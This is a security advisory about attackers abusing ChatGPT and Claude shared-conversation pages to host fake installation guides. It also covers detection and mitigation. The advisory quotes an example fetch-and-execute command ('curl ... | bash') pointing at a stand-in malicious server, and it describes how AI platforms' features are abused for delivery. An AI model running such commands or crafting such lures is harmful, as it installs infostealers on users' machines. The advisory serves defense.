Attackers Abusing ChatGPT and Claude Content-Sharing Features for Malware Delivery and Phishing

Executive Summary

Cybercriminals are weaponizing the legitimate features of popular Large Language Model (LLM) chatbots, including OpenAI's ChatGPT and Anthropic's Claude, to serve as a delivery mechanism for malware. Research from Push Security reveals that threat actors are abusing content-sharing functionalities to host malicious content on the AI platforms' own trusted domains. Attackers create and share conversation links that lead to pages containing social engineering lures. These lures, often disguised as installation guides, persuade users to copy and paste malicious command-line instructions (e.g., curl commands) into their terminals, leading to the download and execution of malware, suspected to be infostealers. This technique capitalizes on the trust users place in these AI brands and their domains.

Threat Overview

The attack is a form of social engineering that leverages the infrastructure of the AI providers themselves.

• Abuse of Trusted Domains: The core of the attack is hosting the malicious lure on a legitimate, trusted domain like chat.openai.com or claude.ai. This makes the link appear safe to users and may bypass simple domain-based blocklists.
• Shared Conversation Feature: Attackers use the 'share conversation' feature to generate a permanent, public URL for a chat they have crafted. This chat contains the malicious instructions.
• Social Engineering Lure: The shared chat is designed to be convincing. One example cited was a page titled "Claude Code on Mac" attributed to "Apple Support," which instructed the user to run a curl command to 'install' a tool.
• Command-Line Deception: The attack preys on the growing normalization of using command-line installers, especially among developers. Users are tricked into running a command that they believe is for a legitimate purpose, but it actually downloads and executes malware.
• Payload: The end payload in the observed campaigns is believed to be information-stealing malware, designed to harvest credentials, cookies, and other sensitive data from the victim's machine.

Technical Analysis

The attack chain is simple but effective:

1. Lure Creation: An attacker crafts a conversation in ChatGPT or Claude that contains malicious instructions disguised as a helpful guide.
2. Link Generation: The attacker uses the 'share' feature to create a public URL for this conversation.
3. Distribution (T1566.002): This malicious URL is distributed to potential victims via phishing emails, social media, or forums.
4. User Interaction (T1204.002): The victim clicks the link and is taken to the trusted AI domain, where they see the attacker's lure.
5. Malicious Command Execution (T1059.004): Trusting the source, the victim copies the provided command (e.g., curl -sL http://malicious.server/install.sh | bash) and runs it in their terminal.
6. Payload Installation: The command downloads and executes the malware from an attacker-controlled server, infecting the victim's machine.

This technique is a variation of Drive-by Compromise (T1189), where the user is an active participant in their own compromise, tricked by the trusted context.

Impact Assessment

While technically simple, this attack vector poses a significant threat due to its psychological effectiveness.

• Bypassing User Skepticism: Users are trained to look for suspicious domains, but a link starting with https://chat.openai.com is likely to be trusted.
• Targeting Technical Users: This attack is particularly effective against developers and IT professionals who are comfortable with the command line and may be less suspicious of curl | bash style installers, which are common in the developer community.
• Infostealer Deployment: A successful attack leads to the deployment of infostealer malware, which can result in the compromise of personal and corporate accounts, financial theft, and further network intrusion.

IOCs — Directly from Articles

No specific malware hashes or C2 domains were provided in the source articles.

Cyber Observables — Hunting Hints

Detection should focus on the delivery and execution stages:

Detection & Response

1. Command-Line Logging: Ensure that comprehensive command-line logging is enabled on all endpoints (e.g., PowerShell script block logging, Event ID 4688 with command line). Ingest these logs into a SIEM to hunt for suspicious patterns like curl | bash.
2. EDR Monitoring: A properly configured EDR should alert on a shell process (bash, sh) spawning a network connection to download a file and then executing it. This is a high-confidence indicator of malicious activity.
3. URL Filtering: While blocking the entire AI domain is not feasible, organizations could consider using URL filtering categories to block or flag links to shared content from these platforms if they are not required for business.

Mitigation

1. User Training (M1017): This is primarily a social engineering attack, so user education is the most critical defense. Train all users, especially technical ones, on the dangers of blindly copying and pasting commands from the internet, regardless of the source. Teach them to inspect scripts before executing them.
2. Restrict Execution (M1038): Use application control and script execution policies to limit the ability of users to run arbitrary scripts downloaded from the internet.
3. Corporate Policy: Establish clear corporate policies on the use of public AI tools and their features. If the 'share conversation' feature has no business use, consider educating users not to use it or click on such links.